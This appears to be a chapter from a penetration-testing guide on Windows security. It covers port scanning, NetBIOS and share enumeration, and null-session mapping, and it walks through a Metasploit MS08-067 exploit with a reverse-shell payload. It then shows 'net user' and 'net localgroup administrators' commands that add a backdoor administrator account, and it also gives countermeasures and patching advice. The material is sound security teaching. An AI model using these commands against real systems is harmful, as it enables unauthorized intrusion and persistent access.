Free Microsoft tools

You can use the following free Microsoft tools to test your systems for various weaknesses:

• Built-in Windows programs for NetBIOS and TCP/UDP service enumeration, such as these three:
  • nbtstat for gathering NetBIOS name-table information.
  • netstat for displaying open ports on the local Windows system.
  • net for running various network-based commands, including viewing shares on remote Windows systems and adding user accounts after you gain a remote command prompt via Metasploit.
• Microsoft Baseline Security Analyzer (MBSA) (https://www.microsoft.com/en-us/download/details.aspx?id=7558) to test for missing patches and basic Windows security settings.
• Sysinternals (https://docs.microsoft.com/en-us/sysinternals) to poke, prod, and monitor Windows services, processes, and resources both locally and over the network.

All-in-one assessment tools

All-in-one tools perform a wide variety of security tests, including the following:

• Port scanning.
• OS fingerprinting.
• Basic password cracking.
• Detailed vulnerability mappings of the various security weaknesses that the tools find on your Windows systems.

I often use these tools in my work with very good results:

• GFI LanGuard (https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard3)
• Nexpose (https://www.rapid7.com/products/nexpose)

Task-specific tools

The following tools perform more specific tasks for uncovering Windows-related security flaws. These tools provide detailed insight into your Windows systems and provide information that you might not get from all-in-one assessment tools:

• Metasploit Framework and Metasploit Pro (https://www.metasploit.com) for exploiting vulnerabilities that such tools as Nessus and Nexpose discover to obtain remote command prompts, add users, set up remote backdoors, and do much more.
• NetScanTools Pro (https://www.netscantools.com) for port scanning, ping sweeping, and share enumeration.
• SoftPerfect Network Scanner (https://www.softperfect.com/products/networkscanner) for host discovery, port scanning, and share enumeration.
• TCPView (https://docs.microsoft.com/en-us/sysinternals/downloads/tcpview) to view TCP and UDP session information.
• Winfo (www.ntsecurity.nu/toolbox/winfo) for null-session enumeration to gather such configuration information as security policies, local user accounts, and shares.

Keep in mind that disabling the Windows Firewall (or other third-party firewall that’s running on your test system) can help speed your scans. The same is true for antivirus software — but be careful. If possible, run your security tests on a dedicated system or virtual machine, because doing so minimizes any effect your test results may have on the other work you do on your computer.

System scanning

A few straightforward processes can identify weaknesses in Windows systems.

Testing

Start gathering information about your Windows systems by running an initial port scan, as follows:

1. Run basic scans to find which ports are open on each Windows system.

   Scan for TCP ports with a port-scanning tool, such as NetScanTools Pro. The NetScanTools Pro results shown in Figure 12-1 reveal several potentially vulnerable ports open on a Windows 10 system, including those for the ever-popular — and easily hacked — NetBIOS (TCP and UDP ports 139) and SQL Server Browser Service (UDP 1434).

2. Perform system enumeration (such as scanning for shares and versions of the Server Message Block, aka SMB, protocol) by using an all-in-one assessment tool (such as LanGuard) or a tool that does targeted work (such as NetScanTools SMB Scanner).

   Figure 12-2 shows a SMB Scanner scan that shows SMB version 1 running on a system, making it vulnerable to attacks such as those brought on by the WannaCry ransomware.

   If you need to quickly identify the specific version of Windows that’s running, you can use Nmap (https://nmap.org/download.html) with the -O option, as shown in Figure 12-3.

   Other OS fingerprinting tools are available, but I've found Nmap and commercial scanners such as Nexpose to be the most accurate.

3. Determine potential security vulnerabilities.

   Vulnerability analysis can be subjective and may vary from system to system, but look for interesting services and applications, and proceed from that point.

NetBIOS

You can gather Windows information by poking around with NetBIOS (Network Basic Input/Output System) functions and programs. NetBIOS allows applications to make networking calls and communicate with other hosts within a LAN.

These Windows NetBIOS ports can be compromised if they aren’t secured properly:

• UDP ports for network browsing:
  • Port 137 (NetBIOS name services, also known as WINS)
  • Port 138 (NetBIOS datagram services)
• TCP ports for Server Message Block (SMB):
  • Port 139 (NetBIOS session services, also known as CIFS)
  • Port 445 (runs SMB over TCP/IP without NetBIOS)

Hacks

The hacks described in the following two sections can be carried out on unprotected systems running NetBIOS.

UNAUTHENTICATED ENUMERATION

When you’re performing your unauthenticated enumeration tests, you can gather configuration information about the local or remote systems in two ways:

• Using all-in-one scanners, such as LanGuard or Nexpose.
• Using the nbtstat program that’s built into Windows. (nbtstat stands for NetBIOS over TCP/IP Statistics.)

Figure 12-4 shows information that you can gather from a Windows 7 system with a simple nbtstat query.

nbtstat shows the remote computer’s NetBIOS name table, which you gather by using the nbtstat -A command. This command displays the computer name, the domain name, and the computer’s media access control (MAC) address.

An advanced program such as Nexpose isn’t necessary to gather this basic information from a Windows system. The graphical interface offered by commercial software such as Nexpose, however, presents its findings in a pretty fashion that’s often easy to use. Additionally, you have the benefit of gathering the information you need with one tool.

SHARES

Windows uses network shares to share certain folders or drives on the system so that other users can access them across the network. Shares are easy to set up and provide a great way to share files with other users on the network without having to involve a server. Shares, however, are often misconfigured, allowing users, malware, and external attackers who have made their way inside the network to access information that they shouldn’t be able to get to. You can search for Windows network shares by using the Share Finder tool that’s built into LanGuard. This tool scans an entire range of IP addresses for Windows shares, as shown in Figure 12-5.

The Everyone group has full share and file access to the LifeandHealth share on the THINKPAD host. I see situations like this one all the time: Someone shares a local drive so others can access it. The problem is this someone often forgets to remove the permissions and leaves a gaping hole for a security breach.

The shares displayed in Figure 12-5 are just what malicious insiders are looking for, because the share names give a hint of what type of files may be accessible if an attacker connects to the shares. After those with ill intent discover such shares, they’re likely to dig a little further to see whether they can browse and access the files within the shares. I cover shares and sensitive information on network shares later in this chapter and in Chapter 16.

Mapping

Follow these steps for each Windows computer to which you want to map a null session:

1. Format the basic net command, like this:

   net use \host_name_or_IP_addressipc$ "" "/user:"

   The net command to map null sessions requires these parameters:

   • net (the built-in Windows network command) followed by the use option.
   • The IP address or host name of the system to which you want to map a null connection.
   • A blank password and username.

   The blanks are why the connection is called null.

2. Press Enter to make the connection.

   Figure 12-6 shows an example of the complete command when mapping a null session. After you map the null session, you should see the message The command completed successfully.

To confirm that the sessions are mapped, enter this command at the command prompt:

net use

As shown in Figure 12-6, you should see the mappings to the IPC$ share on each computer to which you're connected.

Gleaning information

With a null-session connection, you can use other utilities to gather critical Windows information remotely. Dozens of tools can gather this type of information.

You, like a hacker, can take the output of these enumeration programs and attempt (as an unauthorized user) to do the following:

• Crack the passwords of the users you find. (See Chapter 8 for more on password cracking.)
• Map drives to each computer’s network shares.

You can use the following applications for system enumeration against server versions of Windows earlier than Server 2003 as well as Windows XP. Don’t laugh — I still see these archaic versions of Windows running.

net view

The net view command (see Figure 12-7) shows shares that the Windows host has available. You can use the output of this program to see information that the server is advertising to the world and what can be done with it, including the following:

• Share information that an attacker can use to exploit your systems, such as mapping drives and cracking share passwords.
• Share permissions that may need to be removed, such as the permission for the Everyone group, to at least see the share on older Windows 2000–based systems if you have them on your network.

Countermeasures against null-session hacks

If it makes good business sense to do so and the timing is right, upgrade to the more-secure Windows Server 2016 Windows Server 2019 as well as Windows 8.1 or Windows 10, which don’t have the vulnerabilities described in the following list.

You can easily prevent null-session connection hacks by implementing one or more of the following security measures:

• Block NetBIOS on your Windows server by preventing these TCP ports from passing through your network firewall or personal firewall:
  • 139 (NetBIOS sessions services)
  • 445 (runs SMB over TCP/IP without NetBIOS)
• Disable File and Printer Sharing for Microsoft Networks on the Properties tab of the machine’s network connection for systems that don’t need it.

• Restrict anonymous connections to the system. If you happen to have any Windows NT and Windows 2000 systems left in your environment (I hope not!), you can set HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSARestrictAnonymous to a DWORD value as follows:

  • None: This setting is the default.
  • Rely on Default Permissions (Setting 0): This setting allows the default null-session connections.
  • Do Not Allow Enumeration of SAM Accounts and Shares (Setting 1): This setting is the medium security level and still allows null sessions to be mapped to IPC$, enabling such tools as Walksam to garner information from the system.
  • No Access without Explicit Anonymous Permissions (Setting 2): This high-security setting prevents null-session connections and system enumeration.

  No Access without Explicit Anonymous Permissions can create problems for domain controller communication and network browsing, so be careful! You could end up crippling the network.

For later versions of Windows, starting Windows Server 2008 R2 and Windows 7, ensure that the Network Access anonymous components of the local or group security policy are set as shown in Figure 12-8.

Windows defaults

The default share permission depends on the Windows system version.

Testing

Assessing your share permissions is a good way to get an overall view of who can access what. This testing shows how vulnerable your network shares — and sensitive information — can be. You can find shares with default permissions and unnecessary access rights enabled. Trust me; they’re everywhere!

The best way to test for share weaknesses is to log in to the Windows system via a standard local or domain user with no special privileges and then run an enumeration program so you can see who has access to what.

SoftPerfect Network Scanner has built-in share-finder capabilities for uncovering unprotected shares, the options for which are shown in Figure 12-9.

I outline more details on uncovering sensitive information in unstructured files on network shares and other storage systems in Chapter 16.

Using Metasploit

After you find a vulnerability, the next step is exploiting it. In this example, I used Metasploit Framework (an open-source tool owned and maintained by Rapid7) to obtain a remote command prompt on the vulnerable server. Here’s how you can do the same thing:

1. Download and install Metasploit Framework ( https://www.metasploit.com ).

   I used the Windows version; you can download and run the executable.

2. When the installation is complete, run the Metasploit Console, which is Metasploit’s main console.

   (You can also access a web-based version of Metasploit through your browser, but I prefer the console interface.)

   You see a screen similar to the one shown in Figure 12-11.

3. Enter the exploit that you want to run.

   If you want to run the Microsoft MS08-067 Plug and Play exploit, enter the following:

   use exploit/windows/smb/ms08_067_netapi

4. Enter the remote host (RHOST) you want to target and the IP address of the local host (LHOST) you’re on with the following command:

   set RHOST ip_address
set LHOST ip_address

5. Set the target operating system (usually 0 for automatic targeting) with the following command:

   set TARGET 0

6. Set the payload (exploit data) that you want to execute.

   I typically choose windows/shell_reverse_tcp, which provides a remote command prompt on the system being exploited.

   Figure 12-12 shows what you should see on the Metasploit console screen.

7. Enter exploit in the Metasploit console.

   This command invokes the final step, in which Metasploit delivers the payload to the target system. Assuming that the exploit is successful, you should see a command prompt where you can enter typical DOS commands such as dir, as shown in Figure 12-13.

In this ironic example, a Mac is running Windows via the Boot Camp software. I now “own” the system and can do whatever I want. One thing that I commonly do is add a user account to the exploited system. You can do this within Metasploit (via the adduser payloads), but I prefer to do it on my own so that I can get screen shots of my actions. To add a user, enter net user username password /add at the Metasploit command prompt.

Next, add the user to the local administrators group by entering net localgroup administrators username /add at the Metasploit command prompt. Then you can log in to the remote system by mapping a drive to the C$ share or by connecting via Remote Desktop.

If you choose to add a user account during this phase, be sure to remove it when you finish. Otherwise, you can create another vulnerability on the system, especially if the account has a weak password or is otherwise unmanaged. Chapter 3 covers related issues, such as the need for a contract when performing your testing. You want to make sure that you've covered yourself.

All in all, this is vulnerability and penetration testing at its finest!

Two versions of Metasploit are available from Rapid7. The free edition outlined in the preceding steps, Metasploit Framework, may be all you need if an occasional screen shot of remote access or a similar function is sufficient for your testing purposes. A full-blown commercial version called Metasploit Pro is available for the serious security professional. Metasploit Pro adds features for social engineering, web application scanning, and detailed reporting.

Figure 12-14 shows Metasploit Pro’s Overview screen. Notice the workflow features in the Quick Start Wizards icons, including Quick PenTest, Phishing Campaign, and Web App Test. The interface is well thought out, taking the pain out of traditional security scanning, exploitation, and reporting, which is especially helpful for the less-technical IT professional.

Metasploit Pro enables you to import scanner findings (typically, XML files) from third-party vulnerability scanners as well as its sister product, Nexpose. Click the name of your project in the Project Listing section (or create a new one by selecting New Project) and then click the Import button. After the scan data file is imported, you can click the Vulnerabilities tab to see all the original vulnerability scanner findings. To exploit one of the vulnerabilities (assuming that Metasploit Pro supports the exploit), click the finding in the Name column. The resulting page allows you to click Exploit and execute the flaw, as shown in Figure 12-15.

Keep in mind that in this chapter, I’ve demonstrated only a fraction of what Metasploit Framework and Metasploit Pro can do. I highly recommend that you download one or both tools and familiarize yourself with it (or them). Numerous resources at https://www.metasploit.com/help can take your skill set to the next level. Combine Metasploit’s powerful features with the exploit code that’s continually updated at sites such as Offensive Security’s Exploits Database Archive (https://www.exploit-db.com), and you have practically everything you’ll need if you drill down to that level of exploitation in your security testing.

Countermeasures against missing patch vulnerability exploits

Patch your systems — the Windows OS and any Microsoft or third-party applications running on them. I know that patching is a lot easier said than done. Combine that practice with the other hardening recommendations I provide in this chapter, however, and you’ll have a pretty darned secure Windows environment.

To get your arms around the patching process, automate it wherever you can. You can use the following tools:

• Windows Update.
• Windows Server Update Services, which you can find at https://docs.microsoft.com/en-us/windows-server/administration/windows-server-update-services/get-started/windows-server-update-services-wsus.
• System Center Configuration Manager, which you can find at https://www.microsoft.com/en-us/cloud-platform/system-center-configuration-manager.

Keep in mind that these tools are Microsoft-centric patch managers. I can’t stress enough the need to get your third-party patches for Adobe, Java, and other products under control. If you’re looking for a commercial alternative, check out GFI LanGuard’s patch management features (https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard) and PDQ Deploy (https://www.pdq.com/pdq-deploy), among others. I cover patching in depth in Chapter 18.